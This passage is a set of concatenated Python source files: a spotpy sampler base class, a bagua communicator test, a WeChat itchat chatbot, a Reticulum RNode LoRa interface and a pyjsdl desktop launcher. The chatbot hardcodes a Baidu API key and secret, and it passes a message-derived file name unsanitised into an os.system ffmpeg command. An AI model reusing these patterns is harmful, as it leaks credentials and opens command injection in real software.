self.save_threshold = save_threshold
self._return_all_likes = False #allows multi-objective calibration if set to True, is set by the algorithm
if breakpoint == 'read' or breakpoint == 'readandwrite':
print('Reading backupfile')
try:
open(self.dbname+'.break')
except FileNotFoundError:
print('Backupfile not found')
self.dbappend = True
# Now a repeater (ForEach-object) is loaded
# A repeater is a convinent wrapper to repeat tasks
# We have the same interface for sequential and for parallel tasks
if parallel == 'seq':
from spotpy.parallel.sequential import ForEach
elif parallel == 'mpi':
from spotpy.parallel.mpi import ForEach
# MPC is based on pathos mutiprocessing and uses ordered map, so results are given back in the order
# as the parameters are
elif parallel == 'mpc':
from spotpy.parallel.mproc import ForEach
# UMPC is based on pathos mutiprocessing and uses unordered map, so results are given back in the order
# as the subprocesses are finished which may speed up the whole simulation process but is not recommended if
# objective functions do their calculation based on the order of the data because the order of the result is chaotic
# and randomized
elif parallel == 'umpc':
from spotpy.parallel.umproc import ForEach
else:
raise ValueError(
"'%s' is not a valid keyword for parallel processing" % parallel)
# This is the repeater for the model runs. The simulate method does the work
# If you need different tasks, the repeater can be pushed into a "phase" using the
# setphase function. The simulate method can check the current phase and dispatch work
# to other functions. This is introduced for sceua to differentiate between burn in and
# the normal work on the chains
self.repeat = ForEach(self.simulate)
# method "save" needs to know whether objective function result is list or float, default is float
self.like_struct_typ = type(1.1)
def __str__(self):
return '{type}({mtype}())->{dbname}'.format(
type=type(self).__name__,
mtype=type(self.setup).__name__,
dbname=self.dbname)
def __repr__(self):
return '{type}()'.format(type=type(self).__name__)
def get_parameters(self):
"""
Returns the parameter array from the setup
"""
pars = parameter.get_parameters_array(self.setup)
return pars[self.non_constant_positions]
def set_repetiton(self, repetitions):
self.status = _RunStatistic(repetitions, self.algorithm_name,
self.optimization_direction, self.parnames)
# In MPI, this command will do nothing on the master process
# but the worker processes are going to wait for jobs.
# Hence the workers will only receive parameters for the
# simulate function, new calculation phases and the termination
self.repeat.start()
def final_call(self):
self.repeat.terminate()
try:
self.datawriter.finalize()
except AttributeError: # Happens if no database was assigned
pass
self.status.print_status_final()
def _init_database(self, like, randompar, simulations):
if self.dbinit:
print('Initialize database...')
self.datawriter = database.get_datawriter(self.dbformat,
self.dbname, self.parnames, like, randompar, simulations,
save_sim=self.save_sim, dbappend=self.dbappend,
dbinit=self.dbinit, db_precision=self.db_precision,
setup=self.setup)
self.dbinit = False
def __is_list_type(self, data):
if type(data) == type:
return data == list or data == type(np.array([]))
else:
return type(data) == list or type(data) == type(np.array([]))
def save(self, like, randompar, simulations, chains=1):
# Initialize the database if no run was performed so far
self._init_database(like, randompar, simulations)
# Test if like and the save threshold are float/list and compare accordingly
if self.__is_list_type(like) and self.__is_list_type(self.save_threshold):
if all(i > j for i, j in zip(like, self.save_threshold)): #Compares list/list
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and (not self.__is_list_type(self.save_threshold)):
if like>self.save_threshold: #Compares float/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if self.__is_list_type(like) and (not self.__is_list_type(self.save_threshold)):
if like[0]>self.save_threshold: #Compares list/float
self.datawriter.save(like, randompar, simulations, chains=chains)
if (not self.__is_list_type(like)) and self.__is_list_type(self.save_threshold): #Compares float/list
if (like > self.save_threshold).all:
self.datawriter.save(like, randompar, simulations, chains=chains)
def read_breakdata(self, dbname):
''' Read data from a pickle file if a breakpoint is set.
Reason: In case of incomplete optimizations, old data can be restored. '''
import pickle
with open(dbname+'.break', 'rb') as breakfile:
work,backuptime,repos,obmin,obmax,pmin,pmax=pickle.load(breakfile)
self.status.starttime=self.status.starttime-backuptime
self.status.rep=repos
self.status.objectivefunction_min=obmin
self.status.objectivefunction_max=obmax
self.status.params_min=pmin
self.status.params_max=pmax
return work
def write_breakdata(self, dbname, work):
''' Write data to a pickle file if a breakpoint has been set.'''
import pickle
work=(work,self.status.last_print-self.status.starttime,self.status.rep,self.status.objectivefunction_min,self.status.objectivefunction_max,self.status.params_min,self.status.params_max)
with open(str(dbname)+'.break', 'wb') as breakfile:
pickle.dump(work, breakfile)
def getdata(self):
return self.datawriter.getdata()
def update_params(self, params):
#Add potential Constant parameters
self.all_params[self.non_constant_positions] = params
return self.all_params
def postprocessing(self, rep, params, simulation, chains=1, save_run=True, negativlike=False, block_print=False): # TODO: rep not necessaray
params = self.update_params(params)
if negativlike is True:
like = -self.getfitness(simulation=simulation, params=params)
else:
like = self.getfitness(simulation=simulation, params=params)
# Save everything in the database, if save is True
# This is needed as some algorithms just want to know the fitness,
# before they actually save the run in a database (e.g. sce-ua)
self.status(like,params,block_print=block_print)
if save_run is True and simulation is not None:
self.save(like, params, simulations=simulation, chains=chains)
if self._return_all_likes:
return like
else:
try:
iter(like)
return like[0]
except TypeError: # Happens if iter(like) fails, i.e. if like is just one value
return like
def getfitness(self, simulation, params):
"""
Calls the user defined spot_setup objectivefunction
"""
try:
#print('Using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation, params = (params,self.parnames))
except TypeError: # Happens if the user does not allow to pass parameter in the spot_setup.objectivefunction
#print('Not using parameters in fitness function')
return self.setup.objectivefunction(evaluation=self.evaluation, simulation=simulation)
def simulate(self, id_params_tuple):
"""This is a simple wrapper of the model, returning the result together with
the run id and the parameters. This is needed, because some parallel things
can mix up the ordering of runs
"""
id, params = id_params_tuple
self.all_params[self.non_constant_positions] = params #TODO: List parameters are not updated if not accepted for the algorithm, we may have to warn/error if list is given
all_params = self.all_params
if self.sim_timeout:
# we need a layer to fetch returned data from a threaded process into a queue.
def model_layer(q,all_params):
# Call self.model with a namedtuple instead of another sequence
q.put(self.setup.simulation(self.partype(*all_params)))
# starting a queue, where in python2.7 this is a multiprocessing class and can cause errors because of
# incompability which the main thread. Therefore only for older Python version a workaround follows
que = Queue()
sim_thread = threading.Thread(target=model_layer, args=(que, all_params))
sim_thread.daemon = True
sim_thread.start()
# If self.sim_timeout is not None the self.model will break after self.sim_timeout seconds otherwise is runs as
# long it needs to run
sim_thread.join(self.sim_timeout)
# If no result from the thread is given, i.e. the thread was killed from the watcher the default result is
# '[nan]' and will not be saved. Otherwise get the result from the thread
model_result = None
if not que.empty():
model_result = que.get()
else:
model_result = self.setup.simulation(self.partype(*all_params))
return id, params, model_result
|
test_communicator.py
|
import unittest
import torch
import os
from bagua.torch_api.communication import (
init_bagua_communicator,
allreduce,
send,
recv,
allgather,
)
from tests.internal.common_utils import find_free_port
import multiprocessing
import bagua.torch_api as bagua
import threading
import time
from tests import skip_if_cuda_not_available
class Result(object):
def __init__(self):
self.ret = torch.Tensor([False]).bool()
self.data = torch.Tensor([0.0])
def init_env(rank, env):
os.environ["WORLD_SIZE"] = env["WORLD_SIZE"]
os.environ["LOCAL_WORLD_SIZE"] = env["LOCAL_WORLD_SIZE"]
os.environ["MASTER_ADDR"] = env["MASTER_ADDR"]
os.environ["MASTER_PORT"] = env["MASTER_PORT"]
os.environ["BAGUA_SERVICE_PORT"] = env["BAGUA_SERVICE_PORT"]
os.environ["RANK"] = str(rank)
os.environ["LOCAL_RANK"] = str(rank)
# init bagua distributed process group
torch.cuda.set_device(rank)
bagua.init_process_group()
def run_abort(rank, nprocs, results, env):
init_env(rank, env)
os.environ["NCCL_PROTO"] = "^LL128"
comm_stream = torch.cuda.Stream()
comm = init_bagua_communicator(model_name="test_comm", stream=comm_stream)
def abort():
time.sleep(10)
comm.abort()
threading.Thread(target=abort).start()
with torch.cuda.stream(comm_stream):
data = torch.rand(10).cuda()
for _ in range(rank + 1):
comm.allreduce_inplace(data.to_bagua_tensor().bagua_backend_tensor(), 10)
comm_stream.synchronize()
def run_allreduce(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
tensor = send_tensor.clone()
allreduce(send_tensor, recv_tensor)
torch.distributed.all_reduce(tensor)
results[rank].ret[0] = torch.equal(recv_tensor, tensor)
def run_p2p(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros_like(send_tensor)
if rank % 2 == 0:
send(send_tensor, dst=(rank + 1) % nprocs)
results[rank].data.copy_(torch.norm(send_tensor))
else:
recv(recv_tensor, src=(rank - 1 + nprocs) % nprocs)
results[rank].data.copy_(torch.norm(recv_tensor))
def run_allgather(rank, nprocs, results, env):
init_env(rank, env)
send_tensor = torch.rand(100).cuda()
recv_tensor = torch.zeros(
[nprocs, 100], device=send_tensor.device, dtype=send_tensor.dtype
)
tensor = send_tensor.clone()
tensor_list = [torch.zeros_like(tensor) for _ in range(nprocs)]
allgather(send_tensor, recv_tensor)
torch.distributed.all_gather(tensor_list, tensor)
ret = True
for i in range(nprocs):
ret = ret and torch.equal(recv_tensor[i], tensor_list[i])
results[rank].ret[0] = ret
class TestCommunication(unittest.TestCase):
def run_test_locally(self, fn):
nprocs = torch.cuda.device_count()
env = {
"WORLD_SIZE": str(nprocs),
"LOCAL_WORLD_SIZE": str(nprocs),
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(find_free_port(8000, 8100)),
"BAGUA_SERVICE_PORT": str(find_free_port(9000, 9100)),
}
mp = multiprocessing.get_context("spawn")
results = [Result() for _ in range(nprocs)]
processes = []
for i in range(nprocs):
p = mp.Process(
target=fn,
args=(i, nprocs, results, env),
)
p.start()
processes.append(p)
for p in processes:
p.join(timeout=60)
self.assertTrue(p.exitcode == 0)
return results
@skip_if_cuda_not_available()
def test_abort(self):
self.run_test_locally(run_abort)
@skip_if_cuda_not_available()
def test_allreduce(self):
results = self.run_test_locally(run_allreduce)
for ret in results:
self.assertTrue(ret.ret.item())
@skip_if_cuda_not_available()
def test_p2p(self):
results = self.run_test_locally(run_p2p)
i = 1
while i < len(results):
self.assertTrue(torch.equal(results[i].data, results[i - 1].data))
i += 2
@skip_if_cuda_not_available()
def test_allgather(self):
results = self.run_test_locally(run_allgather)
for ret in results:
self.assertTrue(ret.ret.item())
if __name__ == "__main__":
unittest.main()
|
front.py
|
# coding=utf-8
"""
这是对微信的接口
运行的应该是此脚本!
关于itchat的资料:http://www.tuicool.com/articles/VJZRRfn ;GitHub:https://github.com/littlecodersh/ItChat
"""
import os
import random
import threading
import time
import itchat
from itchat.content import *
from code import main
from code.modules.voice import *
ROBOT_NAME = 'Cherry' # **特别注意!**:请将ROBOT_NAME改为自己个人微信号的名字
@itchat.msg_register(FRIENDS)
def add_friend(msg):
itchat.add_friend(**msg['Text']) # 该操作会自动将新好友的消息录入,不需要重载通讯录
itchat.send_msg('我自动接受了你的好友请求,Nice to meet you!', msg['RecommendInfo']['UserName'])
@itchat.msg_register(RECORDING)
def recoding_reply(msg):
api_key = "IfGaEWNp6MGpKHuGv0cRqmig"
api_secert = "4077f676b0b342e841da655e07a8faa2"
bdr = BaiduRest("test_python", api_key, api_secert)
msg['Text'](msg['FileName'])
f = msg['FileName'] + '.wav'
os.system('ffmpeg -i ' + msg['FileName'] + ' -ac 1 -ar 8000 -vn ' + f) # 使用ffmpeg把mp3转为wav
content = bdr.get_text(msg['FileName'] + '.wav')
os.remove(msg['FileName'])
os.remove(f)
return main.reply(content[0], msg['FromUserName'][3:len(msg['FromUserName']) - 10])
@itchat.msg_register(TEXT)
def text_reply(msg):
content = msg['Text']
fromUserName = msg['FromUserName']
reply = main.reply(content, fromUserName[5:10])
time.sleep(random.randint(0, len(content)))
itchat.send(reply, toUserName=msg['FromUserName'])
@itchat.msg_register(TEXT, isGroupChat=True) # 后注册的消息优于先注册的消息,在此先处理群聊消息,就不会出现冲突
def text_reply(msg):
if msg['isAt']: # 如果消息@自己才对消息做出反应
fromUserName = msg['FromUserName']
content = msg['Text']
# 这里的content中包含'@...'
content = content[0:content.find(ROBOT_NAME) - 1] + content[
msg['Text'].find(ROBOT_NAME) + len(ROBOT_NAME):len(content)]
# 这句将content中'@...'去除了
reply = main.reply(content, fromUserName[5:10])
time.sleep(random.randint(0, len(reply)))
itchat.send(u'@%s\u2005%s' % (msg['ActualNickName'], reply), fromUserName)
# 这里的'@...'后面要加上'\u2005'这个Unicode字符,这样的@才是有效的
def birthday(): # TODO:重写函数 2017_07_27
p = [['07', '00', '00', '早安', 1], ['12', '00', '00', '午好', 1], ['22', '00', '00', '晚安', 1]]
class15ChatroomID = '@@988d6acddf9c8fa9fb97ed867e548633233b842a6602a11afc16728b672c697c'
while (1):
year = time.strftime('%Y', time.localtime(time.time()))
month = time.strftime('%m', time.localtime(time.time()))
day = time.strftime('%d', time.localtime(time.time()))
hour = time.strftime('%H', time.localtime(time.time()))
min = time.strftime('%M', time.localtime(time.time()))
second = time.strftime('%S', time.localtime(time.time()))
if hour == '00':
for i in range(0, len(p)):
p[i][4] = 0
for i in range(0, len(p)):
if p[i][4] == 0:
if (p[i][0] <= hour) and (p[i][1] <= min) and (p[i][2] <= second): # TODO:解决运行速度和秒的判断边缘情况冲突
itchat.send(p[i][3], class15ChatroomID)
p[i][4] = 1
itchat.auto_login(hotReload=True) # 增加'hotReload=True'支持热插拔,短时断线重连
thread1 = threading.Thread(target=itchat.run)
thread2 = threading.Thread(target=birthday)
thread1.start()
thread2.start()
itchat.dump_login_status()
|
RNodeInterface.py
|
from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import math
import RNS
class KISS():
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
CMD_UNKNOWN = 0xFE
CMD_DATA = 0x00
CMD_FREQUENCY = 0x01
CMD_BANDWIDTH = 0x02
CMD_TXPOWER = 0x03
CMD_SF = 0x04
CMD_CR = 0x05
CMD_RADIO_STATE = 0x06
CMD_RADIO_LOCK = 0x07
CMD_DETECT = 0x08
CMD_READY = 0x0F
CMD_STAT_RX = 0x21
CMD_STAT_TX = 0x22
CMD_STAT_RSSI = 0x23
CMD_STAT_SNR = 0x24
CMD_BLINK = 0x30
CMD_RANDOM = 0x40
CMD_FW_VERSION = 0x50
CMD_ROM_READ = 0x51
DETECT_REQ = 0x73
DETECT_RESP = 0x46
RADIO_STATE_OFF = 0x00
RADIO_STATE_ON = 0x01
RADIO_STATE_ASK = 0xFF
CMD_ERROR = 0x90
ERROR_INITRADIO = 0x01
ERROR_TXFAILED = 0x02
ERROR_EEPROM_LOCKED = 0x03
@staticmethod
def escape(data):
data = data.replace(bytes([0xdb]), bytes([0xdb, 0xdd]))
data = data.replace(bytes([0xc0]), bytes([0xdb, 0xdc]))
return data
class RNodeInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
FREQ_MIN = 137000000
FREQ_MAX = 1020000000
RSSI_OFFSET = 157
CALLSIGN_MAX_LEN = 32
def __init__(self, owner, name, port, frequency = None, bandwidth = None, txpower = None, sf = None, cr = None, flow_control = False, id_interval = None, id_callsign = None):
self.serial = None
self.owner = owner
self.name = name
self.port = port
self.speed = 115200
self.databits = 8
self.parity = serial.PARITY_NONE
self.stopbits = 1
self.timeout = 100
self.online = False
self.frequency = frequency
self.bandwidth = bandwidth
self.txpower = txpower
self.sf = sf
self.cr = cr
self.state = KISS.RADIO_STATE_OFF
self.bitrate = 0
self.last_id = 0
self.first_tx = None
self.r_frequency = None
self.r_bandwidth = None
self.r_txpower = None
self.r_sf = None
self.r_cr = None
self.r_state = None
self.r_lock = None
self.r_stat_rx = None
self.r_stat_tx = None
self.r_stat_rssi = None
self.r_random = None
self.packet_queue = []
self.flow_control = flow_control
self.interface_ready = False
self.validcfg = True
if (self.frequency < RNodeInterface.FREQ_MIN or self.frequency > RNodeInterface.FREQ_MAX):
RNS.log("Invalid frequency configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.txpower < 0 or self.txpower > 17):
RNS.log("Invalid TX power configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.bandwidth < 7800 or self.bandwidth > 500000):
RNS.log("Invalid bandwidth configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.sf < 7 or self.sf > 12):
RNS.log("Invalid spreading factor configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if (self.cr < 5 or self.cr > 8):
RNS.log("Invalid coding rate configured for "+str(self), RNS.LOG_ERROR)
self.validcfg = False
if id_interval != None and id_callsign != None:
if (len(id_callsign.encode("utf-8")) <= RNodeInterface.CALLSIGN_MAX_LEN):
self.should_id = True
self.id_callsign = id_callsign.encode("utf-8")
self.id_interval = id_interval
else:
RNS.log("The encoded ID callsign for "+str(self)+" exceeds the max length of "+str(RNodeInterface.CALLSIGN_MAX_LEN)+" bytes.", RNS.LOG_ERROR)
self.validcfg = False
else:
self.id_interval = None
self.id_callsign = None
if (not self.validcfg):
raise ValueError("The configuration for "+str(self)+" contains errors, interface is offline")
try:
RNS.log("Opening serial port "+self.port+"...")
self.serial = serial.Serial(
port = self.port,
baudrate = self.speed,
bytesize = self.databits,
parity = self.parity,
stopbits = self.stopbits,
xonxoff = False,
rtscts = False,
timeout = 0,
inter_byte_timeout = None,
write_timeout = None,
dsrdtr = False,
)
except Exception as e:
RNS.log("Could not open serial port for interface "+str(self), RNS.LOG_ERROR)
raise e
if self.serial.is_open:
sleep(2.0)
thread = threading.Thread(target=self.readLoop)
thread.setDaemon(True)
thread.start()
self.online = True
RNS.log("Serial port "+self.port+" is now open")
RNS.log("Configuring RNode interface...", RNS.LOG_VERBOSE)
self.initRadio()
if (self.validateRadioState()):
self.interface_ready = True
RNS.log(str(self)+" is configured and powered up")
sleep(1.0)
else:
RNS.log("After configuring "+str(self)+", the reported radio parameters did not match your configuration.", RNS.LOG_ERROR)
RNS.log("Make sure that your hardware actually supports the parameters specified in the configuration", RNS.LOG_ERROR)
RNS.log("Aborting RNode startup", RNS.LOG_ERROR)
self.serial.close()
raise IOError("RNode interface did not pass validation")
else:
raise IOError("Could not open serial port")
def initRadio(self):
self.setFrequency()
self.setBandwidth()
self.setTXPower()
self.setSpreadingFactor()
self.setCodingRate()
self.setRadioState(KISS.RADIO_STATE_ON)
def setFrequency(self):
c1 = self.frequency >> 24
c2 = self.frequency >> 16 & 0xFF
c3 = self.frequency >> 8 & 0xFF
c4 = self.frequency & 0xFF
data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_FREQUENCY])+data+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring frequency for "+self(str))
def setBandwidth(self):
c1 = self.bandwidth >> 24
c2 = self.bandwidth >> 16 & 0xFF
c3 = self.bandwidth >> 8 & 0xFF
c4 = self.bandwidth & 0xFF
data = KISS.escape(bytes([c1])+bytes([c2])+bytes([c3])+bytes([c4]))
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_BANDWIDTH])+data+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring bandwidth for "+self(str))
def setTXPower(self):
txp = bytes([self.txpower])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_TXPOWER])+txp+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring TX power for "+self(str))
def setSpreadingFactor(self):
sf = bytes([self.sf])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_SF])+sf+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring spreading factor for "+self(str))
def setCodingRate(self):
cr = bytes([self.cr])
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_CR])+cr+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring coding rate for "+self(str))
def setRadioState(self, state):
kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_RADIO_STATE])+bytes([state])+bytes([KISS.FEND])
written = self.serial.write(kiss_command)
if written != len(kiss_command):
raise IOError("An IO error occurred while configuring radio state for "+self(str))
def validateRadioState(self):
RNS.log("Validating radio configuration for "+str(self)+"...", RNS.LOG_VERBOSE)
sleep(0.25);
if (self.frequency != self.r_frequency):
RNS.log("Frequency mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.bandwidth != self.r_bandwidth):
RNS.log("Bandwidth mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.txpower != self.r_txpower):
RNS.log("TX power mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.sf != self.r_sf):
RNS.log("Spreading factor mismatch", RNS.LOG_ERROR)
self.validcfg = False
if (self.validcfg):
return True
else:
return False
def updateBitrate(self):
try:
self.bitrate = self.r_sf * ( (4.0/self.r_cr) / (math.pow(2,self.r_sf)/(self.r_bandwidth/1000)) ) * 1000
self.bitrate_kbps = round(self.bitrate/1000.0, 2)
RNS.log(str(self)+" On-air bitrate is now "+str(self.bitrate_kbps)+ " kbps", RNS.LOG_INFO)
except:
self.bitrate = 0
def processIncoming(self, data):
self.owner.inbound(data, self)
def processOutgoing(self,data):
if self.online:
if self.interface_ready:
if self.flow_control:
self.interface_ready = False
if data == self.id_callsign:
self.first_tx = None
else:
if self.first_tx == None:
self.first_tx = time.time()
data = KISS.escape(data)
frame = bytes([0xc0])+bytes([0x00])+data+bytes([0xc0])
written = self.serial.write(frame)
if written != len(frame):
raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(data)))
else:
self.queue(data)
def queue(self, data):
self.packet_queue.append(data)
def process_queue(self):
if len(self.packet_queue) > 0:
data = self.packet_queue.pop(0)
self.interface_ready = True
self.processOutgoing(data)
elif len(self.packet_queue) == 0:
self.interface_ready = True
def readLoop(self):
try:
in_frame = False
escape = False
command = KISS.CMD_UNKNOWN
data_buffer = b""
command_buffer = b""
last_read_ms = int(time.time()*1000)
while self.serial.is_open:
if self.serial.in_waiting:
byte = ord(self.serial.read(1))
last_read_ms = int(time.time()*1000)
if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
in_frame = False
self.processIncoming(data_buffer)
data_buffer = b""
command_buffer = b""
elif (byte == KISS.FEND):
in_frame = True
command = KISS.CMD_UNKNOWN
data_buffer = b""
command_buffer = b""
elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
command = byte
elif (command == KISS.CMD_DATA):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
data_buffer = data_buffer+bytes([byte])
elif (command == KISS.CMD_FREQUENCY):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_frequency = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
RNS.log(str(self)+" Radio reporting frequency is "+str(self.r_frequency/1000000.0)+" MHz", RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_BANDWIDTH):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_bandwidth = command_buffer[0] << 24 | command_buffer[1] << 16 | command_buffer[2] << 8 | command_buffer[3]
RNS.log(str(self)+" Radio reporting bandwidth is "+str(self.r_bandwidth/1000.0)+" KHz", RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_TXPOWER):
self.r_txpower = byte
RNS.log(str(self)+" Radio reporting TX power is "+str(self.r_txpower)+" dBm", RNS.LOG_DEBUG)
elif (command == KISS.CMD_SF):
self.r_sf = byte
RNS.log(str(self)+" Radio reporting spreading factor is "+str(self.r_sf), RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_CR):
self.r_cr = byte
RNS.log(str(self)+" Radio reporting coding rate is "+str(self.r_cr), RNS.LOG_DEBUG)
self.updateBitrate()
elif (command == KISS.CMD_RADIO_STATE):
self.r_state = byte
elif (command == KISS.CMD_RADIO_LOCK):
self.r_lock = byte
elif (command == KISS.CMD_STAT_RX):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_stat_rx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3])
elif (command == KISS.CMD_STAT_TX):
if (byte == KISS.FESC):
escape = True
else:
if (escape):
if (byte == KISS.TFEND):
byte = KISS.FEND
if (byte == KISS.TFESC):
byte = KISS.FESC
escape = False
command_buffer = command_buffer+bytes([byte])
if (len(command_buffer) == 4):
self.r_stat_tx = ord(command_buffer[0]) << 24 | ord(command_buffer[1]) << 16 | ord(command_buffer[2]) << 8 | ord(command_buffer[3])
elif (command == KISS.CMD_STAT_RSSI):
self.r_stat_rssi = byte-RNodeInterface.RSSI_OFFSET
elif (command == KISS.CMD_STAT_SNR):
self.r_stat_snr = int.from_bytes(bytes([byte]), byteorder="big", signed=True) * 0.25
elif (command == KISS.CMD_RANDOM):
self.r_random = byte
elif (command == KISS.CMD_ERROR):
if (byte == KISS.ERROR_INITRADIO):
RNS.log(str(self)+" hardware initialisation error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
elif (byte == KISS.ERROR_INITRADIO):
RNS.log(str(self)+" hardware TX error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
else:
RNS.log(str(self)+" hardware error (code "+RNS.hexrep(byte)+")", RNS.LOG_ERROR)
elif (command == KISS.CMD_READY):
self.process_queue()
else:
time_since_last = int(time.time()*1000) - last_read_ms
if len(data_buffer) > 0 and time_since_last > self.timeout:
RNS.log(str(self)+" serial read timeout", RNS.LOG_DEBUG)
data_buffer = b""
in_frame = False
command = KISS.CMD_UNKNOWN
escape = False
if self.id_interval != None and self.id_callsign != None:
if self.first_tx != None:
if time.time() > self.first_tx + self.id_interval:
RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.id_callsign.decode("utf-8")), RNS.LOG_DEBUG)
self.processOutgoing(self.id_callsign)
sleep(0.08)
except Exception as e:
self.online = False
RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("The interface "+str(self.name)+" is now offline. Restart Reticulum to attempt reconnection.", RNS.LOG_ERROR)
def __str__(self):
return "RNodeInterface["+self.name+"]"
|
app.py
|
#!/usr/bin/env python
#Pyjsdl - Copyright (C) 2021
#Released under the MIT License
"""
Pyjsdl App
Script launches HTML app on desktop using Gtk/Webkit.
Copy app script to the application root and optionally rename.
Run the script once to create an ini file and edit to configure.
Tested under Linux Gnome desktop with the installed packages:
gir1.2-webkit2-4.0, python-gi (py2), python3-gi (py3).
On other OS, additional installation steps may be required.
"""
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('WebKit2', '4.0')
from gi.repository import Gtk, WebKit2
import multiprocessing
import os.path
import sys
if sys.version_info.major >= 3:
from socketserver import TCPServer
from http.server import SimpleHTTPRequestHandler
else:
from SocketServer import TCPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class Server(TCPServer):
allow_reuse_address = True
def __init__(self, port):
TCPServer.__init__(self, ("", port), SimpleHTTPRequestHandler)
self.process = multiprocessing.Process(target=self.serve_forever)
def initiate(self):
self.process.daemon = True
self.process.start()
def terminate(self):
self.process.terminate()
class QuietServer(Server):
def __init__(self, port):
TCPServer.__init__(self, ("", port), QuietHandler)
self.process = multiprocessing.Process(target=self.serve_forever)
class QuietHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
class App(object):
def __init__(self, config):
self.config = config
self.window = Gtk.Window()
self.window.resize(self.config.width+16,self.config.height+16)
if self.config.app_name is not None:
self.window.set_title(self.config.app_name)
else:
title = self.config.app_uri.split('/')[-1].split('.')[0]
self.window.set_title(title.capitalize())
self.window.connect('destroy', Gtk.main_quit)
self.web = None
self.server = None
def webview_setup(self):
self.web = WebKit2.WebView()
uri = 'http://{}:{}/{}'.format(self.config.server_ip,
self.config.server_port,
self.config.app_uri)
self.web.load_uri(uri)
self.window.add(self.web)
def webview(self):
self.webview_setup()
self.window.show_all()
Gtk.main()
def server_enable(self):
if not self.server:
if self.config.server_log:
self.server = Server(self.config.server_port)
else:
self.server = QuietServer(self.config.server_port)
self.server.initiate()
def server_disable(self):
if self.server:
self.server.terminate()
class Config(object):
def __init__(self):
self.server_ip = 'localhost'
self.server_port = 8000
self.server_log = False
self.app_uri = None
self.app_name = None
self.width = 500
self.height = 500
self.config_name = sys.argv[0].split('.')[0]+'.ini'
if os.path.exists(self.config_name):
cfg_setting = self.read_ini()
else:
self.create_ini()
print('Enter configuration info in {}.'.format(self.config_name))
sys.exit()
for setting in cfg_setting:
if setting == 'app_uri':
self.app_uri = cfg_setting['app_uri'].strip()
if setting == 'app_name':
self.app_name = cfg_setting['app_name'].strip()
if setting == 'window_width':
self.width = int(cfg_setting['window_width'].strip())
if setting == 'window_height':
self.height = int(cfg_setting['window_height'].strip())
if setting == 'server_ip':
self.server_ip = cfg_setting['server_ip'].strip()
if setting == 'server_port':
self.server_port = int(cfg_setting['server_port'].strip())
if setting == 'server_log':
server_log = cfg_setting['server_log'].strip().lower()
self.server_log = {'true':True, 'false':False}[server_log]
def create_ini(self):
f = open(self.config_name, 'w')
f.write('#App Configuration\n\n')
f.write('app_uri app.html\n\n')
